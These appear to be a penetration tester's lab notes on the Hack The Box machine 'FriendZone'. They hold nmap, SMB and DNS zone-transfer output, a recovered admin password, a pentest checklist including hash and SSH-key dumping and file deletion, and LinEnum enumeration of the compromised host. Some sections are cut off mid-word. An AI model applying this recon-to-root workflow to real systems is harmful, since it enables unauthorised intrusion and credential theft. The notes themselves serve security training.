TCP

nmap -sC -sV -oA ./friendzone 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 20:48 EDT
Nmap scan report for 10.10.10.123
Host is up (0.065s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33

SMB

smbclient -L 10.10.10.123
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk Frie

Other

dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.11.14-3-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 64 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Apr 02 09:05:35 EDT 2020
;; XFR size: 8 records (messages 1, bytes 289)

Exploitation

Service Exploited: SMB and PHP Parameter Validation
Vulnerability Type: Local File Inclusion LFI
Exf

Passwords

admin:WORKWORKHhallelujah@# = administrator1.friendzone.red

Proof\Flags\Other

root@FriendZone:~# ls /home
ls /home
friend

Priv Escalation

Service Exploited:
Vulnerability Type:
Exploit POC:
Description:
Discovery of Vulnerability
Exploit Code Used
Proof\Local.txt File

Post Exploitation

Host Information: Operating System, Architecture, Domain, Installed Updates
Network: IPConfig\IFConfig, Network Processes, ARP, DNS, Route
Users & Groups: Users, Groups
Installed Applications: Installed Applications
Running Processes: Process List
Scheduled Jobs: Scheduled Tasks

Methodology

Network Scanning
  ☐ nmap -sn 10.11.1.*
  ☐ nmap -sL 10.11.1.*
  ☐ nbtscan -r 10.11.1.0/24
  ☐ smbtree

Individual Host Scanning
  ☐ nmap --top-ports 20 --open -iL iplist.txt
  ☐ nmap -sS -A -sV -O -p- ipaddress
  ☐ nmap -sU ipaddress

Service Scanning
  WebApp
    Nikto
    dirb
    ☐ dirbuster
    ☐ wpscan
    ☐ dotdotpwn
    ☐ view source
    ☐ davtest\cadaver
    ☐ droopescan
    ☐ joomscan
    ☐ LFI\RFI Test
  Linux\Windows
    ☐ snmpwalk -c public -v1 ipaddress 1
    ☐ smbclient -L //ipaddress
    ☐ showmount -e ipaddress port
    ☐ rpcinfo
    ☐ Enum4Linux
  Anything Else
    nmap scripts (locate *nse* | grep servicename)
    ☐ hydra
    ☐ MSF Aux Modules
    ☐ Download the software

Exploitation
  ☐ Gather Version Numbers
  ☐ Searchsploit
  ☐ Default Creds
  ☐ Creds Previously Gathered
  ☐ Download the software

Post Exploitation
  Linux
    ☐ linux-local-enum.sh
    ☐ linuxprivchecker.py
    ☐ linux-exploit-suggester.sh
    ☐ unix-privesc-check.py
  Windows
    ☐ wpc.exe
    ☐ windows-exploit-suggester.py
    ☐ windows_privesc_check.py
    ☐ windows-privesc-check2.exe

Priv Escalation
  access internal services (portfwd)
  ☐ add account
  Windows
    ☐ List of exploits
  Linux
    ☐ sudo su
    ☐ KernelDB
    ☐ Searchsploit

Final
  ☐ Screenshot of IPConfig\WhoamI
  ☐ Copy proof.txt
  ☐ Dump hashes
  ☐ Dump SSH Keys
  ☐ Delete files

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Enabled

Scan started at:
Thu Apr 2 17:00:45 EEST 2020

### SYSTEM ##############################################

[-] Kernel information:
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.15.0-36-generic (buildd@lgw01-amd64-031) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.1 LTS"
NAME="Ubuntu"
VERSION="18.04.1 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.1 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

[-] Hostname:
FriendZone

### USER/GROUP ##########################################

[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Thu Jan 24 01:12:41 +0200 2019
friend pts/0 10.10.14.3 Thu Jan 24 01:20:15 +0200 2019

[-] Who else is logged on:
17:00:45 up 13:11, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(uuidd) gid=109(uuidd) groups=109(uuidd)
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(Debian-exim) gid=114(Debian-exim) groups=114(Debian-exim)
uid=108(ftp) gid=115(ftp) groups=115(ftp)
uid=109(bind) gid=116(bind) groups=116(bind)

[-] It looks like we have some admin users:
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin
ftp:x:108:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
bind:x:109:116::/var/cache/bind:/usr/sbin/nologin

[-] Super user account(s):
root

[-] Accounts that have recently used sudo:
/home/friend/.sudo_as_admin_successful

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Oct 5 2018 .
drwxr-xr-x 22 root root 4.0K Oct 5 2018 ..
drwxr-xr-x 5 friend friend 4.0K Jan 24 2019 friend

[-] Files not owned by user but writable by group:
-rwxrw-rw- 1 nobody nogroup 5493 Apr 2 16:43 /etc/Development/phprs.php
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py

[-] Files owned by our user:
-rwxrwxrwx 1 www-data www-data 46631 Mar 23 03:36 /tmp/LinEnum.sh
-rw-rw-rw- 1 www-data www-data 5905 Apr 2 17:00 /tmp/output.txt

[-] Hidden files:
-rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 220 Apr 4 2018 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc
-rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile
-rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 1531 Oct 5 2018 /etc/apparmor.d/cache/.features
-rw------- 1 root root 0 Oct 5 2018 /etc/.pwd.lock
-rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.hourly/.placeholder
-rw-r--r-- 1 friend friend 220 Oct 5 2018 /home/friend/.bash_logout
-rw-r--r-- 1 friend friend 3771 Oct 5 2018 /home/friend/.bashrc
-rw-r--r-- 1 friend friend 0 Oct 5 2018 /home/friend/.sudo_as_admin_successful
-rw-r--r-- 1 friend friend 807 Oct 5 2018 /home/friend/.profile

[-] World-readable files within /home:
-rw-r--r-- 1 friend friend 220 Oct 5 2018 /home/friend/.bash_logout
-rw-r--r-- 1 friend friend 3771 Oct 5 2018 /home/friend/.bashrc
-rw-r--r-- 1 friend friend 0 Oct 5 2018 /home/friend/.sudo_as_admin_successful
-rw-r--r-- 1 friend friend 807 Oct 5 2018 /home/friend/.profile
-r--r--r-- 1 root root 33 Oct 6 2018 /home/friend/user.txt

[-] Home directory contents:
total 36K
drwxr-xr-x 8 root root 4.0K Oct 6 2018 .
drwxr-xr-x 12 root root 4.0K Oct 6 2018 ..
drwxr-xr-x 3 root root 4.0K Jan 16 2019 admin
drwxr-xr-x 4 root root 4.0K Oct 6 2018 friendzone
drwxr-xr-x 2 root root 4.0K Oct 6 2018 friendzoneportal
drwxr-xr-x 2 root root 4.0K Jan 15 2019 friendzoneportaladmin
drwxr-xr-x 3 root root 4.0K Oct 6 2018 html
-rw-r--r-- 1 root root 116 Oct 6 2018 mysql_data.conf
drwxr-xr-x 3 root root 4.0K Oct 6 2018 uploads

[-] Root is allowed to login via SSH:
PermitRootLogin yes

### ENVIRONMENTAL #######################################

[-] Environment information:
APACHE_LOG_DIR=/var/log/apache2
LANG=C
OLDPWD=/
INVOCATION_ID=5ea0aea7460e4121b3a4be5062af1996
APACHE_LOCK_DIR=/var/lock/apache2
PWD=/tmp
JOURNAL_STREAM=9:23505
APACHE_RUN_GROUP=www-data
APACHE_RUN_DIR=/var/run/apache2
APACHE_RUN_USER=www-data
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SHLVL=2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root 4096 Oct 5 2018 /bin
drwxr-xr-x 2 root root 4096 Jan 23 2019 /sbin
drwxr-xr-x 2 root root 20480 Jan 23 2019 /usr/bin
drwxr-xr-x 2 root root 4096 Oct 5 2018 /usr/local/bin
drwxr-xr-x 2 root root 4096 Oct 5 2018 /usr/local/sbin
drwxr-xr-x 2 root root 12288 Jan 23 2019 /usr/sbin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash

[-] Current umask value:
0000
u=rwx,g=rwx,o=rwx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################

[-] Cron jobs:
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Oct 6 2018 .
drwxr-xr-x 90 root root 4096 Jan 23 2019 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 712 Jan 18 2018 php
-rw-r--r-- 1 root root 191 Oct 5 2018 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Oct 6 2018 .
drwxr-xr-x 90 root root 4096 Jan 23 2019 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 539 Jun 27 2018 apache2
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 3 2017 dpkg
-rwxr-xr-x 1 root root 4128 Jan 28 2018 exim4-base
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 383 Apr 18 2018 samba
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Oct 5 2018 .
drwxr-xr-x 90 root root 4096 Jan 23 2019 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Oct 5 2018 .
drwxr-xr-x 90 root root 4096 Jan 23 2019 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Oct 5 2018 .
drwxr-xr-x 90 root root 4096 Jan 23 2019 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Thu 2020-04-02 17:09:00 EEST 8min left Thu 2020-04-02 16:39:01 EEST 21min ago phpsessionclean.timer phpsessionclean.service
Thu 2020-04-02 22:08:23 EEST 5h 7min left Thu 2020-04-02 13:55:42 EEST 3h 5min ago apt-daily.timer apt-daily.service
Fri 2020-04-03 04:03:49 EEST 11h left Thu 2020-04-02 04:03:49 EEST 12h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Fri 2020-04-03 05:01:23 EEST 12h left Thu 2020-04-02 16:30:51 EEST 30min ago motd-news.timer motd-news.service
Fri 2020-04-03 06:13:41 EEST 13h left Thu 2020-04-02 06:27:07 EEST 10h ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2020-04-06 00:00:00 EEST 3 days left Thu 2020-04-02 03:48:55 EEST 13h ago fstrim.timer fstrim.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
7 timers listed.

### NETWORKING ##########################################

[-] Network and IP info:
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 10.10.10.123 netmask 255.255.255.0 broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:df8e prefixlen 64 scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:df8e prefixlen 64 scopeid 0x0<global>
        ether 00:50:56:b9:df:8e txqueuelen 1000 (Ethernet)
        RX packets 62577 bytes 4713575 (4.7 MB)
        RX errors 0 dropped 89 overruns 0 frame 0
        TX packets 39635 bytes 5743591 (5.7 MB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
        device interrupt 19 base 0x2000
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
        loop txqueuelen 1000 (Local Loopback)
        RX packets 53082 bytes 3610482 (3.6 MB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 53082 bytes 3610482 (3.6 MB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:f9:ab [ether] on ens33

[-] Nameserver(s):
nameserver 127.0.0.53

[-] Nameserver(s):
Global
        DNSSEC NTA: 10.in-addr.arpa
                    16.172.in-addr.arpa
                    168.192.in-addr.arpa
                    17.172.in-addr.arpa
                    18.172.in-addr.arpa
                    19.172.in-addr.arpa
                    20.172.in-addr.arpa
                    21.172.in-addr.arpa
                    22.172.in-addr.arpa
                    23.172.in-addr.arpa
                    24.172.in-addr.arpa
                    25.172.in-addr.arpa
                    26.172.in-addr.arpa
                    27.172.in-addr.arpa
                    28.172.in-addr.arpa
                    29.172.in-addr.arpa
                    30.172.in-addr.arpa
                    31.172.in-addr.arpa
                    corp
                    d.f.ip6.arpa
                    home
                    internal
                    intranet
                    lan
                    local
                    private
                    test
Link 2 (ens33)
        Current Scopes: DNS
        LLMNR setting: yes
        MulticastDNS setting: no
        DNSSEC setting: no
        DNSSEC supported: no
        DNS Servers: 8.8.8.8
                     8.8.4.4

[-] Default route:
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 10.10.10.123:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::443 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -

[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 10.10.10.123:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 2304 0 127.0.0.53:53 0.0.0.0:* -
udp 46848 0 10.10.10.255:137 0.0.0.0:* -
udp 1536 0 10.10.10.123:137 0.0.0.0:* -
udp 46848 0 0.0.0.0:137 0.0.0.0:* -
udp 34240 0 10.10.10.255:138 0.0.0.0:* -
udp 0 0 10.10.10.123:138 0.0.0.0:* -
udp 34240 0 0.0.0.0:138 0.0.0.0:* -

### SERVICES #############################################

[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.9 159428 8636 ? Ss 03:48 0:04 /sbin/init splash
root 2 0.0 0.0 0 0 ? S 03:48 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 03:48 0:00 [kworker/0:0H]
root 6 0.0 0.0 0 0 ? I< 03:48 0:00 [mm_percpu_wq]
root 7 0.0 0.0 0 0 ? S 03:48 0:00 [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 03:48 0:06 [rcu_sched]
root 9 0.0 0.0 0 0 ? I 03:48 0:00 [rcu_bh]
root 10 0.0 0.0 0 0 ? S 03:48 0:00 [migration/0]
root 11 0.0 0.0 0 0 ? S 03:48 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 03:48 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 03:48 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? I< 03:48 0:00 [netns]
root 15 0.0 0.0 0 0 ? S 03:48 0:00 [rcu_tasks_kthre]
root 16 0.0 0.0 0 0 ? S 03:48 0:00 [kauditd]
root 17 0.0 0.0 0 0 ? S 03:48 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 03:48 0:00 [oom_reaper]
root 19 0.0 0.0 0 0 ? I< 03:48 0:00 [writeback]
root 20 0.0 0.0 0 0 ? S 03:48 0:00 [kcompactd0]
root 21 0.0 0.0 0 0 ? SN 03:48 0:00 [ksmd]
root 22 0.0 0.0 0 0 ? SN 03:48 0:00 [khugepaged]
root 23 0.0 0.0 0 0 ? I< 03:48 0:00 [crypto]
root 24 0.0 0.0 0 0 ? I< 03:48 0:00 [kintegrityd]
root 25 0.0 0.0 0 0 ? I< 03:48 0:00 [kblockd]
root 26 0.0 0.0 0 0 ? I< 03:48 0:00 [ata_sff]
root 27 0.0 0.0 0 0 ? I< 03:48 0:00 [md]
root 28 0.0 0.0 0 0 ? I< 03:48 0:00 [edac-poller]
root 29 0.0 0.0 0 0 ? I< 03:48 0:00 [devfreq_wq]
root 30 0.0 0.0 0 0 ? I< 03:48 0:00 [watchdogd]
root 32 0.0 0.0 0 0 ? I 03:48 0:19 [kworker/0:1]
root 34 0.0 0.0 0 0 ? S 03:48 0:00 [kswapd0]
root 35 0.0 0.0 0 0 ? S 03:48 0:00 [ecryptfs-kthrea]
root 77 0.0 0.0 0 0 ? I< 03:48 0:00 [kthrotld]
root 78 0.0 0.0 0 0 ? I< 03:48 0:00 [acpi_thermal_pm]
root 79 0.0 0.0 0 0 ? S 03:48 0:00 [scsi_eh_0]
root 80 0.0 0.0 0 0 ? I< 03:48 0:00 [scsi_tmf_0]
root 81 0.0 0.0 0 0 ? S 03:48 0:00 [scsi_eh_1]
root 82 0.0 0.0 0 0 ? I< 03:48 0:00 [scsi_tmf_1]
root 88 0.0 0.0 0 0 ? I< 03:48 0:00 [ipv6_addrconf]
root 89 0.0 0.0 0 0 ? I 03:48 0:05 [kworker/0:2]
root 98 0.0 0.0 0 0 ? I< 03:48 0:00 [kstrp]
root 115 0.0 0.0 0 0 ? I< 03:48 0:00 [charger_manager]
root 167 0.0 0.0 0 0 ? S 03:48 0:00 [scsi_eh_2]
root 168 0.0 0.0 0 0 ? I< 03:48 0:00 [scsi_tmf_2]
root 169 0.0 0.0 0 0 ? I< 03:48 0:00 [vmw_pvscsi_wq_2]
root 171 0.0 0.0 0 0 ? I< 03:48 0:00 [kworker/0:1H]
root 172 0.0 0.0 0 0 ? I< 03:48 0:00 [ttm_swap]
root 173 0.0 0.0 0 0 ? S 03:48 0:00 [irq/16-vmwgfx]
root 194 0.0 0.0 0 0 ? S 03:48 0:00 [jbd2/sda1-8]
root 195 0.0 0.0 0 0 ? I< 03:48 0:00 [ext4-rsv-conver]
root 227 0.0 1.8 95376 17256 ? S<s 03:48 0:02 /lib/systemd/systemd-journald
root 232 0.0 1.2 192652 11376 ? Ssl 03:48 0:34 /usr/bin/vmtoolsd
root 253 0.0 0.4 45196 4224 ? Ss 03:48 0:00 /lib/systemd/systemd-udevd
systemd+ 254 0.0 0.5 71820 5256 ? Ss 03:48 0:02 /lib/systemd/systemd-networkd
systemd+ 367 0.0 0.3 141912 3216 ? Ssl 03:48 0:02 /lib/systemd/systemd-timesyncd
systemd+ 368 0.0 0.6 70876 6108 ? Ss 03:48 0:04 /lib/systemd/systemd-resolved
root 371 0.0 0.7 287540 7036 ? Ssl 03:48 0:01 /usr/lib/accountsservice/accounts-daemon
root 375 0.0 0.3 31320 3256 ? Ss 03:48 0:00 /usr/sbin/cron -f
root 378 0.0 1.8 170408 17240 ? Ssl 03:48 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
message+ 380 0.0 0.4 50056 4528 ? Ss 03:48 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 381 0.0 1.0 87740 9864 ? Ss 03:48 0:00 /usr/bin/VGAuthService
root 387 0.0 0.6 62004 5572 ? Ss 03:48 0:00 /lib/systemd/systemd-logind
syslog 388 0.0 0.5 263036 4684 ? Ssl 03:48 0:00 /usr/sbin/rsyslogd -n
bind 442 0.0 2.2 216820 21096 ? Ssl 03:48 0:00 /usr/sbin/named -f -4 -u bind
root 450 0.0 0.6 72296 6388 ? Ss 03:48 0:00 /usr/sbin/sshd -D
root 456 0.0 0.3 28676 2760 ? Ss 03:48 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 464 0.0 0.2 16180 1960 tty1 Ss+ 03:48 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 557 0.0 2.1 331720 19468 ? Ss 03:48 0:01 /usr/sbin/apache2 -k start
www-data 558 0.0 2.0 336596 18468 ? S 03:48 0:00 /usr/sbin/apache2 -k start
0 0.0 4536 780 pts/0 S+ 17:00 0:00 tee -a
www-data 14066 0.0 0.3 19300 2840 pts/0 S+ 17:01 0:00 /bin/bash ./LinEnum.sh -t
www-data 14067 0.0 0.3 36700 3104 pts/0 R+ 17:01 0:00 ps aux

[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash
lrwxrwxrwx 1 root root 4 Oct 5 2018 /bin/sh -> dash
-rwxr-xr-x 1 root root 129096 Jul 20 2018 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root 219272 Jul 20 2018 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root 1616976 Jul 20 2018 /lib/systemd/systemd-networkd
-rwxr-xr-x 1 root root 378944 Jul 20 2018 /lib/systemd/systemd-resolved
-rwxr-xr-x 1 root root 38976 Jul 20 2018 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root 584136 Jul 20 2018 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root 56552 May 16 2018 /sbin/agetty
lrwxrwxrwx 1 root root 20 Jul 20 2018 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root 125144 Oct 10 2018 /usr/bin/VGAuthService
-rwxr-xr-x 1 root root 236584 Nov 16 2017 /usr/bin/dbus-daemon
lrwxrwxrwx 1 root root 9 Jun 22 2018 /usr/bin/python3 -> python3.6
-rwxr-xr-x 1 root root 47360 Oct 10 2018 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root 182552 Dec 18 2017 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root 671392 Oct 3 2018 /usr/sbin/apache2
-rwxr-xr-x 1 root root 47416 Nov 16 2017 /usr/sbin/cron
-rwsr-xr-x 1 root root 1140200 Feb 14 2018 /usr/sbin/exim4
-rwxr-xr-x 1 root root 790472 Aug 10 2018 /usr/sbin/named
-rwxr-xr-x 1 root root 247832 Aug 6 2018 /usr/sbin/nmbd
-rwxr-xr-x 1 root root 680488 Apr 24 2018 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root 84064 Aug 6 2018 /usr/sbin/smbd
-rwxr-xr-x 1 root root 786856 Feb 10 2018 /usr/sbin/sshd
-rwxr-xr-x 1 root root 168200 Feb 5 2018 /usr/sbin/vsftpd

